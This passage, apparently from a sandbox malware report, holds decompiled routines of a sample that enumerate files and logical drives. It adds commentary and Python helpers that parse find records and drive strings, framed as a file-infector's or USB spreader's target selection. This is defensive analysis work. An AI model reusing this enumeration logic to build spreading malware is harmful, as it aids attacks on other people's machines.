                                                                          				struct _WIN32_FIND_DATAA* _t87;
                                                                          
                                                                          				_t85 = __esi;
                                                                          				_t70 = __edx;
                                                                          				_t61 = __ecx;
                                                                          				_t60 = __eax;
                                                                          				asm("pushad");
                                                                          				E004052D8(__eax);
                                                                          				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
                                                                          				asm("popad");
                                                                          				asm("pushad");
                                                                          				_t2 = _t60 + 0x1c; // 0x1c
                                                                          				E004030E8(_t2, _t70);
                                                                          				asm("popad");
                                                                          				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
                                                                          					asm("pushad");
                                                                          					_t4 = _t60 + 0x1c; // 0x1c
                                                                          					E00404DB8( *_t4, _t4);
                                                                          					_t32 =  *((intOrPtr*)(_t60 + 0x20));
                                                                          					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                                                                          						_t56 = E00405C80();
                                                                          						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
                                                                          						asm("popad");
                                                                          						asm("pushad");
                                                                          						_t57 = _t61;
                                                                          						_t61 = _t56;
                                                                          						_t58 = E004048D8(_t57, _t56, 0x40569b);
                                                                          						_t82 = _t61;
                                                                          						if(_t58 == 0) {
                                                                          							_t82 = E004056A7;
                                                                          						}
                                                                          						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
                                                                          					}
                                                                          					asm("popad");
                                                                          					_t87 = _t86 + 0xfffffec0;
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
                                                                          					_pop(_t63);
                                                                          					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
                                                                          					E004044A8();
                                                                          					_t38 = _t63;
                                                                          					_push(_t38);
                                                                          					_t39 = FindFirstFileA(_t38, _t87); // executed
                                                                          					_t84 = _t39;
                                                                          					asm("pushfd");
                                                                          					E00403094(_t87);
                                                                          					asm("popfd");
                                                                          					if(_t39 + 1 != 0) {
                                                                          						do {
                                                                          							if(E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4) != 0) {
                                                                          								asm("jecxz 0x16");
                                                                          								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
                                                                          								asm("jecxz 0x22");
                                                                          								asm("loop 0x31");
                                                                          								_push(E00402448(0x140));
                                                                          								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
                                                                          								_pop(_t80);
                                                                          								_t69 = 0x140;
                                                                          								E0040254C(_t87, _t69, _t80);
                                                                          							}
                                                                          							_t45 = FindNextFileA(_t84, _t87); // executed
                                                                          						} while (_t45 != 0);
                                                                          						FindClose(_t84);
                                                                          					}
                                                                          				}
                                                                          				 *((intOrPtr*)(_t60 + 0x20)) = 0;
                                                                          				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
                                                                          			}

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                          • Opcode Fuzzy Hash: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
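Reading the listing of E00405634 with the structure sizes in hand makes its purpose clear. It reserves 0x140 bytes of stack (`_t86 + 0xfffffec0`), builds the search pattern from the directory and the "*.*" string noted under String ID, and hands the buffer to FindFirstFileA/FindNextFileA. `_v336` is that buffer and `_v292` lies 44 bytes into it, so the filter at 0x40536C receives `&cFileName`: 44 (0x2C) is the offset of cFileName in WIN32_FIND_DATAA, and 0x140 (320) is sizeof(WIN32_FIND_DATAA). For every entry the filter accepts, the loop invokes the callback at object+0x24, obtains a 0x140-byte block from E00402448, copies the record into it with E0040254C and appends it to the list at object+0x18 with E004045E8; in other words, the routine collects raw find records for later processing. The Python below, added here and not code from the report or the sample, decodes such records from a memory dump of that list. The field names are the Win32 ones; the two sample records are constructed in the block.

```python
import struct
from datetime import datetime, timedelta, timezone

# WIN32_FIND_DATAA as laid out by 32-bit Windows: 318 bytes of fields, and
# sizeof() == 0x140 (320) once the trailing padding is counted.
FIND_DATA = struct.Struct("<I Q Q Q I I I I 260s 14s")
RECORD_SIZE = 0x140
CFILENAME_OFFSET = struct.calcsize("<I Q Q Q I I I I")   # 44 == _v336 - _v292
FILE_ATTRIBUTE_DIRECTORY = 0x10
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC; zero means unset."""
    return None if ft == 0 else FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def cstr(raw):
    """NUL-terminated ANSI string, decoded as latin-1 so every byte round-trips."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def parse_find_record(buf):
    """Decode one WIN32_FIND_DATAA from the start of `buf`."""
    if len(buf) < RECORD_SIZE:
        raise ValueError("short record: %d bytes, need %d" % (len(buf), RECORD_SIZE))
    (attrs, ctime, atime, wtime, size_hi, size_lo,
     _res0, _res1, name, alt) = FIND_DATA.unpack_from(buf)
    return {
        "attributes": attrs,
        "is_directory": bool(attrs & FILE_ATTRIBUTE_DIRECTORY),
        "size": (size_hi << 32) | size_lo,
        "created": filetime_to_datetime(ctime),
        "accessed": filetime_to_datetime(atime),
        "written": filetime_to_datetime(wtime),
        "name": cstr(name),
        "short_name": cstr(alt),
    }


def parse_find_list(blob):
    """Split back-to-back 0x140-byte records (the stride the routine copies) into entries."""
    return [parse_find_record(blob[off:off + RECORD_SIZE])
            for off in range(0, len(blob) - RECORD_SIZE + 1, RECORD_SIZE)]


def build_find_record(name, attrs=0, size=0, written=None, short_name=""):
    """Pack a record the way FindFirstFileA/FindNextFileA fill it (constructed test data)."""
    wt = datetime_to_filetime(written) if written else 0
    packed = FIND_DATA.pack(attrs, 0, 0, wt, size >> 32, size & 0xFFFFFFFF, 0, 0,
                            name.encode("latin-1"), short_name.encode("latin-1"))
    return packed.ljust(RECORD_SIZE, b"\0")


# Constructed sample dump: two consecutive records, as the list would look in memory.
SAMPLE_WRITTEN = datetime(2021, 9, 30, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_DUMP = (build_find_record("calc.exe", 0x20, 0x1E000, SAMPLE_WRITTEN, "CALC~1.EXE")
               + build_find_record("Windows", FILE_ATTRIBUTE_DIRECTORY))

if __name__ == "__main__":
    for entry in parse_find_list(SAMPLE_DUMP):
        print(entry["name"], entry["size"], entry["is_directory"], entry["written"])
```

To apply it to the sandbox's memory dumps, carve the list elements at the pointers stored under object+0x18 and feed each 0x140-byte block to parse_find_record; the `is_directory` flag and `name` fields are what a file-infector's selection logic keys on, so a decoded list shows which entries the walk retained.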

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 71%
                                                                          			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				struct _WIN32_FIND_DATAA _v336;
                                                                          				char _v340;
                                                                          				char _v344;
                                                                          				signed int _t50;
                                                                          				signed int _t51;
                                                                          				int _t53;
                                                                          				intOrPtr* _t76;
                                                                          				intOrPtr _t85;
                                                                          				void* _t96;
                                                                          				void* _t99;
                                                                          
                                                                           				_v344 = 0;                                                                  // 0x0040508d
                                                                           				_v340 = 0;                                                                  // 0x00405093
                                                                           				_v16 = 0;                                                                   // 0x00405099
                                                                           				_t76 = __ecx;                                                               // 0x0040509c  out-parameter: string the matches are appended to
                                                                           				_v12 = __edx;                                                               // 0x0040509e  mask (e.g. "*.*")
                                                                           				_v8 = __eax;                                                                // 0x004050a1  directory
                                                                           				E004033FC(_v8);                                                             // 0x004050a7
                                                                           				E004033FC(_v12);                                                            // 0x004050af
                                                                           				_push(_t99);                                                                // 0x004050b6
                                                                           				_push(0x4051db);                                                            // 0x004050b7
                                                                           				_push( *[fs:eax]);                                                          // 0x004050bc  SEH frame for the try/finally below
                                                                           				 *[fs:eax] = _t99 + 0xfffffeac;                                             // 0x004050bf
                                                                           				E00403094(__ecx);                                                           // 0x004050c4
                                                                           				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {              // 0x004050cd  0x5c == '\\': append a backslash if the directory lacks one
                                                                           					E00403214( &_v8, 0x4051f0);                                                // 0x004050e9
                                                                           				}                                                                           // 0x004050e9
                                                                           				if(_v12 != 0 &&  *_v12 == 0x5c) {                                           // 0x004050f2  strip a leading backslash from the mask
                                                                           					E00404728(_v12,  &_v340, 2);                                               // 0x0040510a
                                                                           					E0040312C( &_v12, _v340);                                                  // 0x00405118
                                                                           				}                                                                           // 0x00405118
                                                                           				E00403258( &_v16, _v12, _v8);                                               // 0x00405126  _v16 = directory + mask
                                                                           				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336);                            // 0x0040513b  executed
                                                                           				_t96 = _t50;                                                                // 0x00405140
                                                                           				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;                              // 0x00405144
                                                                           				while(_t51 != 0) {                                                          // 0x004051a6
                                                                           					if((_v336.dwFileAttributes & 0x00000010) <= 0) {                           // 0x00405153  0x10 == FILE_ATTRIBUTE_DIRECTORY: only plain files are collected
                                                                           						if( *_t76 != 0) {                                                         // 0x00405158
                                                                           							E00403214(_t76, E004051FC);                                              // 0x00405161  separator constant appended between entries
                                                                           						}                                                                         // 0x00405161
                                                                           						_push( *_t76);                                                            // 0x00405166
                                                                           						_push(_v8);                                                               // 0x00405168
                                                                           						E004031F4( &_v344, 0x104,  &(_v336.cFileName));                           // 0x0040517c  0x104 == MAX_PATH
                                                                           						_push(_v344);                                                             // 0x00405181
                                                                           						E004032CC();                                                              // 0x0040518e  result += directory + cFileName
                                                                           					}                                                                          // 0x0040518e
                                                                           					_t53 = FindNextFileA(_t96,  &_v336);                                       // 0x0040519b  executed
                                                                           					asm("sbb eax, eax");                                                       // 0x004051a3
                                                                           					_t51 = _t53 + 1;                                                           // 0x004051a5
                                                                           				}                                                                           // 0x004051a5
                                                                           				FindClose(_t96);                                                            // 0x004051ab  executed
                                                                           				_pop(_t85);                                                                 // 0x004051b2
                                                                           				 *[fs:eax] = _t85;                                                          // 0x004051b5
                                                                           				_push(E004051E2);                                                           // 0x004051b8
                                                                           				E004030B8( &_v344, 2);                                                      // 0x004051c8
                                                                           				return E004030B8( &_v16, 3);                                                // 0x004051da

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                                          • Instruction ID: 84585f26add88bff0cc2ce1aee7b2e7e5f9eb71f6f66f1e556af33cdfbb1cecb
                                                                          • Opcode Fuzzy Hash: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                                          • Instruction Fuzzy Hash: ED415070900508AFDB11EF95C885BDEBBB8EF89305F5044FAE404BB291D7389F459E59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 412 4056a7-4056e7 call 405300 call 403258 call 4044a8 FindFirstFileA call 403094 422 405746-405759 call 404520 412->422 423 4056e9-4056fc call 40536c 412->423 429 405735-40573e FindNextFileA 423->429 430 4056fe-405701 423->430 429->423 433 405740-405741 FindClose 429->433 431 405703-405713 430->431 432 405717-405730 call 402448 call 4045e8 call 40254c 430->432 431->429 437 405715 431->437 432->429 433->422 437->422 437->432
                                                                          C-Code - Quality: 55%
                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                          				void* _t14;
                                                                          				CHAR* _t20;
                                                                          				void* _t21;
                                                                          				int _t30;
                                                                          				void* _t41;
                                                                          				void* _t45;
                                                                          				void* _t51;
                                                                          				void* _t60;
                                                                          				void* _t62;
                                                                          				void* _t65;
                                                                          				void* _t67;
                                                                          				struct _WIN32_FIND_DATAA* _t68;
                                                                          
                                                                           				_t64 = __esi;                                                               // 0x004056a7
                                                                           				_t41 = __ebx;                                                               // 0x004056a7  object whose callbacks (+0x24) and fields (+0x18, +0x1c, +0x20) are used below
                                                                           				_t14 = __eax -  *__eax;                                                     // 0x004056a7  quality 55%: this prologue and the asm() lines below are likely mis-decoded bytes
                                                                           				asm("popad");                                                               // 0x004056a9
                                                                           				_t68 = _t67 + 0xfffffec0;                                                   // 0x004056aa  -0x140: a WIN32_FIND_DATAA (sizeof == 0x140) on the stack
                                                                           				_push(0);                                                                   // 0x004056b2
                                                                           				_push(0);                                                                   // 0x004056b3
                                                                           				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);                          // 0x004056b7
                                                                           				_pop(_t45);                                                                 // 0x004056c3
                                                                           				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));   // 0x004056c5  builds the search string
                                                                           				E004044A8();                                                                // 0x004056ca
                                                                           				_t20 = _t45;                                                                // 0x004056cf
                                                                           				_push(_t20);                                                                // 0x004056d2
                                                                           				_t21 = FindFirstFileA(_t20, _t68);                                          // 0x004056d5  executed
                                                                           				_t62 = _t21;                                                                // 0x004056da
                                                                           				asm("pushfd");                                                              // 0x004056df
                                                                           				E00403094(_t68);                                                            // 0x004056e0
                                                                           				asm("popfd");                                                               // 0x004056e5
                                                                           				if(_t21 + 1 != 0) {                                                         // 0x004056e7  handle != INVALID_HANDLE_VALUE (-1)
                                                                           					do {                                                                       // 0x004056e9
                                                                           						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) { // 0x004056fc  filter on attributes and name
                                                                           							asm("jecxz 0x16");                                                       // 0x00405701
                                                                           							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);                                   // 0x0040570f  per-entry callback with the find record
                                                                           							asm("jecxz 0x22");                                                       // 0x00405713
                                                                           							asm("loop 0x31");                                                        // 0x00405715
                                                                           							_push(E00402448(0x140));                                                 // 0x00405722  allocate sizeof(WIN32_FIND_DATAA)
                                                                           							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);                           // 0x00405727
                                                                           							_pop(_t60);                                                              // 0x0040572c
                                                                           							_t51 = 0x140;                                                            // 0x0040572d
                                                                           							E0040254C(_t68, _t51, _t60);                                             // 0x00405730  copy the record into the list at +0x18
                                                                           						}                                                                         // 0x00405730
                                                                           						_t30 = FindNextFileA(_t62, _t68);                                         // 0x00405737  executed
                                                                           					} while (_t30 != 0);                                                       // 0x0040573c
                                                                           					FindClose(_t62);                                                           // 0x00405741
                                                                           				}                                                                           // 0x00405741
                                                                           				 *((intOrPtr*)(_t41 + 0x20)) = 0;                                           // 0x0040574e
                                                                           				return E00404520( *((intOrPtr*)(_t41 + 0x20)));                             // 0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                          • Opcode Fuzzy Hash: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 551 406d40-406d77 GetLogicalDriveStringsA 552 406dd5-406de1 551->552 553 406de3-406dfb call 403094 552->553 554 406d79-406d91 GetDriveTypeA 552->554 556 406dd2 554->556 557 406d93-406da1 call 40258c 554->557 556->552 557->556 562 406da3-406db1 call 40258c 557->562 562->556 565 406db3-406dcd call 4031b4 call 403214 562->565 565->556
                                                                          C-Code - Quality: 67%
                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
                                                                          				char _v155;
                                                                          				char _v160;
                                                                          				signed int _t37;
                                                                          				intOrPtr _t41;
                                                                          				void* _t45;
                                                                          				void* _t50;
                                                                          				void* _t51;
                                                                          
                                                                           				_t50 = _t51;                                                                // 0x00406d41
                                                                           				_v160 = 0;                                                                  // 0x00406d4e
                                                                           				_t45 = __eax;                                                               // 0x00406d54  out-parameter: string the accepted drive roots are appended to
                                                                           				_push(_t50);                                                                // 0x00406d58
                                                                           				_push(0x406dfc);                                                            // 0x00406d59
                                                                           				_push( *[fs:eax]);                                                          // 0x00406d5e  SEH frame for the try/finally below
                                                                           				 *[fs:eax] = _t51 + 0xffffff64;                                             // 0x00406d61
                                                                           				GetLogicalDriveStringsA(0x97,  &_v155);                                     // 0x00406d70  executed; 0x97-byte buffer of "X:\" entries, each NUL-terminated, list ends with a second NUL
                                                                           				_t37 = 0;                                                                   // 0x00406d75
                                                                           				while(_a12245929 != 0) {                                                    // 0x00406dd5  decompiler artefact: loop runs until the buffer's terminating NUL (inferred)
                                                                           					_t48 = _t37 & 0x000000ff;                                                  // 0x00406d7b
                                                                           					if(GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97) != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) { // 0x00406d91  5 == DRIVE_CDROM; 0x41/0x42 == 'A'/'B' (floppies); E0040258C is likely an UpCase helper
                                                                           						E004031B4();                                                              // 0x00406dc0
                                                                           						E00403214(_t45, _v160);                                                   // 0x00406dcd  keep this drive root
                                                                           					}                                                                          // 0x00406dcd
                                                                           					_t37 = _t37 + 4;                                                           // 0x00406dd2  next entry: "X:\" plus NUL is 4 bytes
                                                                           				}                                                                           // 0x00406dd2
                                                                           				_pop(_t41);                                                                 // 0x00406de5
                                                                           				 *[fs:eax] = _t41;                                                          // 0x00406de8
                                                                           				_push(E00406E03);                                                           // 0x00406deb
                                                                           				return E00403094( &_v160);                                                  // 0x00406dfb

                                                                          APIs
                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Drive$LogicalStringsType
                                                                          • String ID:
                                                                          • API String ID: 1630765265-0
                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
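The function above calls GetLogicalDriveStringsA and then GetDriveTypeA, which is why the sandbox reports it as a drive check of the kind that precedes USB spreading. The Python below is an added example, not code from the sample or from the Joe Sandbox report: it parses the double-NUL-terminated multi-string that GetLogicalDriveStringsA fills and keeps only the roots GetDriveTypeA reports as DRIVE_REMOVABLE, which is the filtering an analyst would expect such a loop to perform before touching a volume. The sample buffer and the drive-type lookup table are constructed so the example runs offline; `live_drive_strings` is the only real Win32 call and is assumed to be used on Windows only.

```python
"""Added example: parse a GetLogicalDriveStringsA buffer and classify each
root with the codes GetDriveTypeA returns. Not code from the analysed sample."""
import ctypes
import sys
from typing import Callable, Dict, List

# Return values of GetDriveTypeA (winbase.h).
DRIVE_UNKNOWN = 0
DRIVE_NO_ROOT_DIR = 1
DRIVE_REMOVABLE = 2
DRIVE_FIXED = 3
DRIVE_REMOTE = 4
DRIVE_CDROM = 5
DRIVE_RAMDISK = 6

DRIVE_TYPE_NAMES = {
    DRIVE_UNKNOWN: "unknown", DRIVE_NO_ROOT_DIR: "no-root",
    DRIVE_REMOVABLE: "removable", DRIVE_FIXED: "fixed", DRIVE_REMOTE: "remote",
    DRIVE_CDROM: "cdrom", DRIVE_RAMDISK: "ramdisk",
}


def parse_drive_strings(buf: bytes) -> List[str]:
    """Split the multi-string GetLogicalDriveStringsA writes ("A:\\<NUL>C:\\<NUL><NUL>").

    The list ends at the first empty entry (the double NUL), so stale bytes
    past it in an oversized buffer are ignored, as the API contract intends.
    """
    roots = []
    for chunk in buf.split(b"\x00"):
        if not chunk:
            break
        roots.append(chunk.decode("ascii"))
    return roots


def classify_drives(buf: bytes, get_drive_type: Callable[[str], int]) -> Dict[str, str]:
    """Map each root to a drive-type name; get_drive_type stands in for GetDriveTypeA."""
    return {root: DRIVE_TYPE_NAMES.get(get_drive_type(root), "unknown")
            for root in parse_drive_strings(buf)}


def removable_roots(buf: bytes, get_drive_type: Callable[[str], int]) -> List[str]:
    """Roots a USB-spreading loop would act on: DRIVE_REMOVABLE only."""
    return [root for root in parse_drive_strings(buf)
            if get_drive_type(root) == DRIVE_REMOVABLE]


# Constructed sample input: four roots with drive types chosen for the example.
SAMPLE_BUFFER = b"A:\\\x00C:\\\x00D:\\\x00E:\\\x00\x00"
SAMPLE_TYPES = {"A:\\": DRIVE_REMOVABLE, "C:\\": DRIVE_FIXED,
                "D:\\": DRIVE_CDROM, "E:\\": DRIVE_REMOVABLE}


def sample_drive_type(root: str) -> int:
    """Offline stand-in for GetDriveTypeA using the constructed table."""
    return SAMPLE_TYPES.get(root, DRIVE_UNKNOWN)


def live_drive_strings() -> bytes:
    """The real call; assumed to run on Windows, where ctypes.windll exists."""
    k32 = ctypes.windll.kernel32
    needed = k32.GetLogicalDriveStringsA(0, None)  # required size when the buffer is too small
    buf = ctypes.create_string_buffer(needed + 1)
    k32.GetLogicalDriveStringsA(needed, buf)
    return buf.raw


if __name__ == "__main__":
    if sys.platform == "win32":
        raw = live_drive_strings()
        drive_type_a = ctypes.windll.kernel32.GetDriveTypeA
        get_type = lambda root: drive_type_a(root.encode("ascii"))
    else:
        raw, get_type = SAMPLE_BUFFER, sample_drive_type
    for root, kind in classify_drives(raw, get_type).items():
        print(root, kind)
    print("removable:", removable_roots(raw, get_type))
```

On the constructed buffer the removable set is `A:\` and `E:\`; the fixed and optical roots are skipped, which is the same decision a spreader makes when it decides where to drop copies.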

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph for E00404F6C. Blocks: 569 404f6c-404f7a (FindFirstFileA); 571 404f7c-404f83 (FindClose); 570 404f87-404f8d. Edges: 569->570, 569->571, 571->570.
                                                                          C-Code - Quality: 100%
                                                                          			E00404F6C(CHAR* __eax) {
                                                                          				intOrPtr _v288;
                                                                          				void* _t3;
                                                                          				void* _t4;
                                                                          				struct _WIN32_FIND_DATAA* _t8;
                                                                          
                                                                          				_t3 = FindFirstFileA(__eax, _t8); // executed; _t8 points at the stack WIN32_FIND_DATAA
                                                                          				_t4 = _t3 + 1; // INVALID_HANDLE_VALUE is -1, so _t4 == 0 means the path was not found
                                                                          				if(_t4 != 0) {
                                                                          					FindClose(_t4 - 1); // executed; the search handle is released at once, only the lookup result is wanted
                                                                          					return _v288; // value read back from the find-data area filled by the call
                                                                          				}
                                                                          				return _t4; // 0 on failure
                                                                          			}
                                                                          Instruction addresses listed by the sandbox (the assembly text itself is not on the page): 0x00404f74, 0x00404f79, 0x00404f7a, 0x00404f7e, 0x00000000, 0x00404f83, 0x00404f8d

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                          • Opcode Fuzzy Hash: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
